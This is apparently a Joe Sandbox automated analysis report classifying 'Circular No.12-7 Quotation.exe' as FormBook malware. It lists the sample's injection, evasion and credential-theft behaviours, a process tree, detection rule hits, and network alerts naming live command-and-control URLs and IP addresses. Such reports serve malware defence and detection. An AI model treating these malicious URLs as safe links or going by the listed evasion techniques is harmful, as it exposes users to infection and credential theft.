Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Circular No.12-7 Quotation.exe

Overview

General Information

Sample name:Circular No.12-7 Quotation.exe
Analysis ID:1638345
MD5:56734e92cd71bd3e9196490bcc54ad78
SHA1:2f8cf475c0d67a285ad95f18e98a19f63dea32eb
SHA256:db9bfe84076041b929fd58cac1cfcfeff77b6505b68c88c5acd12550f73ede2e
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • Circular No.12-7 Quotation.exe (PID: 7036 cmdline: "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe" MD5: 56734E92CD71BD3E9196490BCC54AD78)
    • svchost.exe (PID: 4396 cmdline: "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • 3kdbs1NJMiXeHlFl.exe (PID: 2652 cmdline: "C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\Dp1mEYJM.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • reg.exe (PID: 6328 cmdline: "C:\Windows\SysWOW64\reg.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • 3kdbs1NJMiXeHlFl.exe (PID: 3804 cmdline: "C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\A7ardSpFW.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 1456 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.3410503483.00000000032B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1100047298.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.3412367873.00000000037B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.3414676780.0000000005650000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.3412285944.0000000003760000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe", CommandLine: "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe", ParentImage: C:\Users\user\Desktop\Circular No.12-7 Quotation.exe, ParentProcessId: 7036, ParentProcessName: Circular No.12-7 Quotation.exe, ProcessCommandLine: "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe", ProcessId: 4396, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe", CommandLine: "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe", ParentImage: C:\Users\user\Desktop\Circular No.12-7 Quotation.exe, ParentProcessId: 7036, ParentProcessName: Circular No.12-7 Quotation.exe, ProcessCommandLine: "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe", ProcessId: 4396, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-14T11:27:55.087499+010028554651A Network Trojan was detected192.168.2.94969147.239.127.20780TCP
                2025-03-14T11:28:18.710814+010028554651A Network Trojan was detected192.168.2.949697208.91.197.2780TCP
                2025-03-14T11:28:32.471703+010028554651A Network Trojan was detected192.168.2.949702188.114.96.380TCP
                2025-03-14T11:28:46.066230+010028554651A Network Trojan was detected192.168.2.949706162.254.32.7780TCP
                2025-03-14T11:28:59.440627+010028554651A Network Trojan was detected192.168.2.949710188.114.97.380TCP
                2025-03-14T11:29:12.754055+010028554651A Network Trojan was detected192.168.2.949714199.59.243.22880TCP
                2025-03-14T11:29:26.160580+010028554651A Network Trojan was detected192.168.2.949718104.21.27.20380TCP
                2025-03-14T11:29:39.662990+010028554651A Network Trojan was detected192.168.2.94972252.223.13.4180TCP
                2025-03-14T11:29:53.023580+010028554651A Network Trojan was detected192.168.2.949726172.67.211.1080TCP
                2025-03-14T11:30:07.444763+010028554651A Network Trojan was detected192.168.2.949730154.201.91.24680TCP
                2025-03-14T11:30:21.342436+010028554651A Network Trojan was detected192.168.2.949734208.91.197.2780TCP
                2025-03-14T11:30:34.537038+010028554651A Network Trojan was detected192.168.2.94973813.248.169.4880TCP
                2025-03-14T11:30:47.785743+010028554651A Network Trojan was detected192.168.2.94974213.248.169.4880TCP
                2025-03-14T11:31:01.461065+010028554651A Network Trojan was detected192.168.2.94974652.223.13.4180TCP
                2025-03-14T11:31:14.786995+010028554651A Network Trojan was detected192.168.2.949750199.59.243.22880TCP
                2025-03-14T11:31:28.400429+010028554651A Network Trojan was detected192.168.2.949754103.224.182.24280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-14T11:28:10.794194+010028554641A Network Trojan was detected192.168.2.949694208.91.197.2780TCP
                2025-03-14T11:28:13.349436+010028554641A Network Trojan was detected192.168.2.949695208.91.197.2780TCP
                2025-03-14T11:28:15.908873+010028554641A Network Trojan was detected192.168.2.949696208.91.197.2780TCP
                2025-03-14T11:28:24.831505+010028554641A Network Trojan was detected192.168.2.949699188.114.96.380TCP
                2025-03-14T11:28:27.352365+010028554641A Network Trojan was detected192.168.2.949700188.114.96.380TCP
                2025-03-14T11:28:29.951694+010028554641A Network Trojan was detected192.168.2.949701188.114.96.380TCP
                2025-03-14T11:28:38.468348+010028554641A Network Trojan was detected192.168.2.949703162.254.32.7780TCP
                2025-03-14T11:28:40.953596+010028554641A Network Trojan was detected192.168.2.949704162.254.32.7780TCP
                2025-03-14T11:28:43.516352+010028554641A Network Trojan was detected192.168.2.949705162.254.32.7780TCP
                2025-03-14T11:28:51.711841+010028554641A Network Trojan was detected192.168.2.949707188.114.97.380TCP
                2025-03-14T11:28:54.363442+010028554641A Network Trojan was detected192.168.2.949708188.114.97.380TCP
                2025-03-14T11:28:56.913154+010028554641A Network Trojan was detected192.168.2.949709188.114.97.380TCP
                2025-03-14T11:29:04.974967+010028554641A Network Trojan was detected192.168.2.949711199.59.243.22880TCP
                2025-03-14T11:29:07.528815+010028554641A Network Trojan was detected192.168.2.949712199.59.243.22880TCP
                2025-03-14T11:29:10.096648+010028554641A Network Trojan was detected192.168.2.949713199.59.243.22880TCP
                2025-03-14T11:29:18.496314+010028554641A Network Trojan was detected192.168.2.949715104.21.27.20380TCP
                2025-03-14T11:29:21.065077+010028554641A Network Trojan was detected192.168.2.949716104.21.27.20380TCP
                2025-03-14T11:29:23.604791+010028554641A Network Trojan was detected192.168.2.949717104.21.27.20380TCP
                2025-03-14T11:29:31.849409+010028554641A Network Trojan was detected192.168.2.94971952.223.13.4180TCP
                2025-03-14T11:29:34.517586+010028554641A Network Trojan was detected192.168.2.94972052.223.13.4180TCP
                2025-03-14T11:29:37.118036+010028554641A Network Trojan was detected192.168.2.94972152.223.13.4180TCP
                2025-03-14T11:29:46.126444+010028554641A Network Trojan was detected192.168.2.949723172.67.211.1080TCP
                2025-03-14T11:29:47.921584+010028554641A Network Trojan was detected192.168.2.949724172.67.211.1080TCP
                2025-03-14T11:29:50.485955+010028554641A Network Trojan was detected192.168.2.949725172.67.211.1080TCP
                2025-03-14T11:29:59.715006+010028554641A Network Trojan was detected192.168.2.949727154.201.91.24680TCP
                2025-03-14T11:30:02.288384+010028554641A Network Trojan was detected192.168.2.949728154.201.91.24680TCP
                2025-03-14T11:30:04.871166+010028554641A Network Trojan was detected192.168.2.949729154.201.91.24680TCP
                2025-03-14T11:30:13.283729+010028554641A Network Trojan was detected192.168.2.949731208.91.197.2780TCP
                2025-03-14T11:30:15.935044+010028554641A Network Trojan was detected192.168.2.949732208.91.197.2780TCP
                2025-03-14T11:30:18.532029+010028554641A Network Trojan was detected192.168.2.949733208.91.197.2780TCP
                2025-03-14T11:30:27.900859+010028554641A Network Trojan was detected192.168.2.94973513.248.169.4880TCP
                2025-03-14T11:30:30.447603+010028554641A Network Trojan was detected192.168.2.94973613.248.169.4880TCP
                2025-03-14T11:30:31.929814+010028554641A Network Trojan was detected192.168.2.94973713.248.169.4880TCP
                2025-03-14T11:30:40.040317+010028554641A Network Trojan was detected192.168.2.94973913.248.169.4880TCP
                2025-03-14T11:30:42.600489+010028554641A Network Trojan was detected192.168.2.94974013.248.169.4880TCP
                2025-03-14T11:30:45.249033+010028554641A Network Trojan was detected192.168.2.94974113.248.169.4880TCP
                2025-03-14T11:30:53.695772+010028554641A Network Trojan was detected192.168.2.94974352.223.13.4180TCP
                2025-03-14T11:30:56.279216+010028554641A Network Trojan was detected192.168.2.94974452.223.13.4180TCP
                2025-03-14T11:30:58.821736+010028554641A Network Trojan was detected192.168.2.94974552.223.13.4180TCP
                2025-03-14T11:31:07.003336+010028554641A Network Trojan was detected192.168.2.949747199.59.243.22880TCP
                2025-03-14T11:31:09.613803+010028554641A Network Trojan was detected192.168.2.949748199.59.243.22880TCP
                2025-03-14T11:31:12.226444+010028554641A Network Trojan was detected192.168.2.949749199.59.243.22880TCP
                2025-03-14T11:31:20.744314+010028554641A Network Trojan was detected192.168.2.949751103.224.182.24280TCP
                2025-03-14T11:31:23.285040+010028554641A Network Trojan was detected192.168.2.949752103.224.182.24280TCP
                2025-03-14T11:31:25.834338+010028554641A Network Trojan was detected192.168.2.949753103.224.182.24280TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Circular No.12-7 Quotation.exeAvira: detected
                Source: http://www.mylivingbio.online/dj43/Avira URL Cloud: Label: malware
                Source: http://www.maxank.top/esrt/?1XnHA=Dauko676kCztHQAUUyMqfDrPu2fQElEVTvMTsJhZ5gXLx1NdSwykiYrwT7juNmxOBLlr8LsBbcSb/+BWh1+dEKgLoqbQeSkqVGFp5dHi2mQg5XUXXA==&wLdh=EfwHw2a0Avira URL Cloud: Label: malware
                Source: http://www.5s5zz.icu/7aoy/?wLdh=EfwHw2a0&1XnHA=fp2YbicaeZCvjPlEl0aAeG9DbZJy1pf6RkH12Jc9jsEP3xNt5+yvvuwn7GzaPio27TEiEJpJOLWrHvzanHbqOhWV4kgihPbOC+3XvFKcaqXhBW3X1g==Avira URL Cloud: Label: malware
                Source: http://www.Mylivingbio.onlineAvira URL Cloud: Label: malware
                Source: http://www.full4movies.christmas/eg1u/?wLdh=EfwHw2a0&1XnHA=SD/6wpCnW86cIrWdC51SgvJ3a2i94M6xAqZXzX2LTq+ZxSYJstNKHiEBWhqrQIE7yMyB6clEy8PjJK9sDHiCyb6J4kg3QTLZlCQR8B4F3qLFR0UV7w==Avira URL Cloud: Label: malware
                Source: http://www.mylivingbio.online/__media__/js/trademark.php?d=mylivingbio.online&type=nsAvira URL Cloud: Label: malware
                Source: http://www.mylivingbio.online/__media__/design/underconstructionnotice.php?d=mylivingbio.onlineAvira URL Cloud: Label: malware
                Source: http://www.maxank.top/esrt/Avira URL Cloud: Label: malware
                Source: http://www.full4movies.christmas/eg1u/Avira URL Cloud: Label: malware
                Source: Circular No.12-7 Quotation.exeReversingLabs: Detection: 60%
                Source: Circular No.12-7 Quotation.exeVirustotal: Detection: 43%Perma Link
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3410503483.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1100047298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3412367873.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3414676780.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3412285944.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1100405446.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1100935711.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3412469604.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Circular No.12-7 Quotation.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: wntdll.pdbUGP source: Circular No.12-7 Quotation.exe, 00000000.00000003.964572948.0000000003590000.00000004.00001000.00020000.00000000.sdmp, Circular No.12-7 Quotation.exe, 00000000.00000003.964466960.00000000033F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.998556542.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1100441787.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1000427179.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1100441787.000000000379E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000003.00000002.3412602500.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000003.00000003.1100545587.000000000364F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000003.00000003.1103640377.0000000003839000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000003.00000002.3412602500.00000000039E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Circular No.12-7 Quotation.exe, 00000000.00000003.964572948.0000000003590000.00000004.00001000.00020000.00000000.sdmp, Circular No.12-7 Quotation.exe, 00000000.00000003.964466960.00000000033F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.998556542.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1100441787.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1000427179.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1100441787.000000000379E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, reg.exe, 00000003.00000002.3412602500.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000003.00000003.1100545587.000000000364F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000003.00000003.1103640377.0000000003839000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000003.00000002.3412602500.00000000039E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: reg.pdb source: svchost.exe, 00000001.00000003.1068669592.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1068566769.000000000301A000.00000004.00000020.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000002.00000003.1037912153.0000000000F94000.00000004.00000020.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000002.00000002.3411794169.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: reg.exe, 00000003.00000002.3413365532.000000000400C000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3410869469.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1398982673.000000003A1BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: reg.exe, 00000003.00000002.3413365532.000000000400C000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3410869469.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1398982673.000000003A1BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: reg.pdbGCTL source: svchost.exe, 00000001.00000003.1068669592.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1068566769.000000000301A000.00000004.00000020.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000002.00000003.1037912153.0000000000F94000.00000004.00000020.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000002.00000002.3411794169.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 3kdbs1NJMiXeHlFl.exe, 00000002.00000002.3410489291.00000000003DF000.00000002.00000001.01000000.00000004.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3410487822.00000000003DF000.00000002.00000001.01000000.00000004.sdmp
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C7445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7445A
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C7C6D1 FindFirstFileW,FindClose,0_2_00C7C6D1
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00C7C75C
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7F3F3
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C737EF
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C73B12
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032CC640 FindFirstFileW,FindNextFileW,FindClose,3_2_032CC640
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4x nop then xor eax, eax3_2_032B9F80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4x nop then pop edi3_2_032BE271

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49691 -> 47.239.127.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49699 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49703 -> 162.254.32.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49695 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49720 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49700 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49730 -> 154.201.91.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49709 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49731 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49736 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49712 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49740 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49726 -> 172.67.211.10:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49694 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49706 -> 162.254.32.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49717 -> 104.21.27.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49702 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49729 -> 154.201.91.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49725 -> 172.67.211.10:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49696 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49737 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49708 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49704 -> 162.254.32.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49707 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49716 -> 104.21.27.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49714 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49705 -> 162.254.32.77:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49710 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49748 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49744 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49697 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49719 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49750 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49715 -> 104.21.27.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49735 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49742 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49727 -> 154.201.91.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49734 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49753 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49701 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49749 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49747 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49724 -> 172.67.211.10:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49722 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49718 -> 104.21.27.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49728 -> 154.201.91.246:80
